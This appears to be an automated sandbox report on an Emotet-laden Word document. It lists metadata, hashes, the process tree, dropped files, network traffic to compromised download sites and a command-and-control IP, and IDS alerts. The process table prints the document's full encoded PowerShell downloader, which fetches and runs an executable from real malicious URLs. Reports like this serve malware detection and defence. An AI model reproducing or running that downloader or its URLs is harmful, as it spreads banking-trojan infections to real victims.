File name: | szczegoly.doc |
Full analysis: | https://app.any.run/tasks/e1a582bd-71b5-4f33-a43a-f5d2a2977b5e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 20:32:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Liberia, Subject: Venezuela, Author: Brady Armstrong, Comments: Kazakhstan SDD, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:22:00 2019, Last Saved Time/Date: Wed Sep 18 07:22:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 880502DBB19916B5FC57E3202752C17D |
SHA1: | C9A2CF80EC1B6DDA621E639F938917A797DFC56B |
SHA256: | 01997BF9C459E1250484878AF709735D9DC1343DB78EE117E14056B28316BAFA |
SSDEEP: | 6144:m8qZiq86MofT1K82zw1qW2WPLkIp7NSU4jJntATfDfAv8ipwwPCQ3cqx:m8qZiq86MofT1K82zw1qW2EXp7NSU4Vb |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Reilly |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 641 |
Paragraphs: | 1 |
Lines: | 4 |
Company: | Spinka Group |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 547 |
Words: | 95 |
Pages: | 1 |
ModifyDate: | 2019:09:18 06:22:00 |
CreateDate: | 2019:09:18 06:22:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | Kazakhstan SDD |
Keywords: | - |
Author: | Brady Armstrong |
Subject: | Venezuela |
Title: | Liberia |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3544 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\szczegoly.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4016 | powershell -encod JAB6AHoATAA5AHMAYwA3AFUAPQAnAG0AVwBiAEoATwA0ACcAOwAkAEMAbgAwAFAAcgB0ACAAPQAgACcAMwA3ADMAJwA7ACQAcwBLAHEAdwA0AHUAPQAnAEIAcwBJAGIAagBqAFMAdQAnADsAJABJAEMAMABmAFEAdgBGADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAbgAwAFAAcgB0ACsAJwAuAGUAeABlACcAOwAkAEsAVgBoAGsAOABaAEIASgA9ACcAdQBaAEcANAA1AG8AMwAnADsAJAB3AG8AaQAzAFMAdQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAQgBjAGwAaQBFAG4AdAA7ACQAQwBXAGIAYQAzAHcARABzAD0AJwBoAHQAdABwADoALwAvAGQAaQByAHAAcgBvAHAAZQByAHQAaQBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBmAGQAMQA0ADkAOQA5AC8AQABoAHQAdABwADoALwAvAHIAdQBuAC0AZwBlAHIAbQBhAG4AeQAuAGMAbwBtAC8AcwBjAHIAaQBwAHQAcwAvAGoAYwA4ADIAOAAyADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBzAGEAeAB0AG8AcgBwAGgALgBuAGUAdAAvAEQATwBDAC8ANQBuAGQAcQBvAHYAMAAxADgALwBAAGgAdAB0AHAAcwA6AC8ALwBzAHUAawBoAHUAbQB2AGkAdABoAG8AbQBlAHMALgBjAG8AbQAvAHMAYQB0AGgAbwByAG4AYwBvAG4AZABvAHMALgBjAG8AbQAvAHUAYwB3AG4AYQA3ADkANAAvAEAAaAB0AHQAcAA6AC8ALwB2AGEAbgBzAGMAaABlAGUAcgBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AZwBvAHIAcAA3AHYANAA1ADUAMwA3ADAALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAJwBAACcAKQA7ACQAQwBUAE4ARAB0ADUAPQAnAGoATgB3AEoAYQAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABqAFgASQBPAFIASAB0ACAAaQBuACAAJABDAFcAYgBhADMAdwBEAHMAKQB7AHQAcgB5AHsAJAB3AG8AaQAzAFMAdQAuACIAZABPAHcAYABOAGAATABvAGAAQQBkAGYASQBsAEUAIgAoACQAagBYAEkATwBSAEgAdAAsACAAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAWABoAFIATwBRAHYAPQAnAEEAMQBuAGwAUABpADMAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAQwAwAGYAUQB2AEYANQApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMgA1ADgAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAVAAiACgAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAUwBfAFIAegByAFQAPQAnAHcASwBpAGkAYQA1AHQAJwA7AGIAcgBlAGEAawA7ACQAaQBhAEQAUwBrAGIAPQAnAE4AQgAwAEUAVwBHAGoAQQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAEwAdABrADcARgBXAHcAPQAnAFIATQBzAGgARwB2AEcAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3540 | "C:\Users\admin\373.exe" | C:\Users\admin\373.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2816 | "C:\Users\admin\373.exe" | C:\Users\admin\373.exe | — | 373.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2888 | --92e680ed | C:\Users\admin\373.exe | — | 373.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3716 | --92e680ed | C:\Users\admin\373.exe | 373.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3012 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 373.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3752 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4072 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2764 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9BD7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3544 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:22848578905EFA57903DBD2E3344CDE4 | SHA256:B759EA8865B84D133934B2B94D535A3A2D78414120716BD4AD99E8FB67F0F30A | |||
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:BA8E9894E601D674272E577B661F122B | SHA256:8E77DA75AB1857B323B8EDAFB225E62697963E70C6720A7201AA291F614FA47D | |||
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6971839.wmf | wmf | |
MD5:43528A4FBE58A69F23A83730249C26A6 | SHA256:C2E24CBFAE5E442328E9870FA551B77059F8570CEC53FCA983F873A2A7C3C905 | |||
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C97579D.wmf | wmf | |
MD5:4573D51460798C6BFF7FD683D7CFE8A9 | SHA256:AA5203EBDE4949B0ADC774E4068CE4C0BF7E4AA4B24406662173C1CB8296DBC9 | |||
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFBF495.wmf | wmf | |
MD5:7A126CAEA1C6E1AF213A189B87BDDA32 | SHA256:916A7B57C1C92A259BE1841E0A7126BFCF921D187B36595B1D93ACB623B806F7 | |||
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58D6A8B3.wmf | wmf | |
MD5:14B04A5BB3376B18C70D9DC8DCC877F6 | SHA256:67D4827E14C13C3C45BFF185832B1B0C35279875393DC88598ECBFA7A707BA65 | |||
3544 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\szczegoly.doc.LNK | lnk | |
MD5:74F2B8472B1A84CA4CC5EC8A5D139BFE | SHA256:87DE598ACC4E81943C5D580630BAB7744C3B2A79D3893C49DB6E712E39C1372D | |||
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D204DFAF.wmf | wmf | |
MD5:A7E112D4577D6AF2CEA525EBC689B27D | SHA256:E92B757F3C6A1EA2914268636866DD4F34CC4D02E62D0473161A067616DB45B1 | |||
3544 | WINWORD.EXE | C:\Users\admin\Desktop\~$czegoly.doc | pgc | |
MD5:25D9F812F70EA534632724BFEE483010 | SHA256:C8E70664579AC87812FE922FED6C38DCC31580F7B1CB08AFF42FDFD87308AE89 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4016 | powershell.exe | GET | 200 | 81.169.145.69:80 | http://run-germany.com/scripts/jc828208/ | DE | html | 4.56 Kb | malicious |
4016 | powershell.exe | GET | 302 | 173.254.28.118:80 | http://dirproperties.com/cgi-bin/fd14999/ | US | html | 301 b | suspicious |
4016 | powershell.exe | GET | 200 | 173.254.28.118:80 | http://dirproperties.com/cgi-sys/suspendedpage.cgi | US | html | 7.41 Kb | suspicious |
2764 | easywindow.exe | POST | 200 | 114.79.134.129:443 | http://114.79.134.129:443/acquire/ | IN | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4016 | powershell.exe | 173.254.28.118:80 | dirproperties.com | Unified Layer | US | suspicious |
2764 | easywindow.exe | 114.79.134.129:443 | — | D-Vois Broadband Pvt Ltd | IN | malicious |
4016 | powershell.exe | 93.191.156.116:80 | saxtorph.net | Zitcom A/S | DK | suspicious |
4016 | powershell.exe | 45.120.148.57:443 | sukhumvithomes.com | A2 Hosting, Inc. | SG | suspicious |
4016 | powershell.exe | 81.169.145.69:80 | run-germany.com | Strato AG | DE | malicious |
Domain | IP | Reputation |
---|---|---|
dirproperties.com |
| suspicious |
run-germany.com |
| malicious |
saxtorph.net |
| suspicious |
sukhumvithomes.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2764 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2764 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2764 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |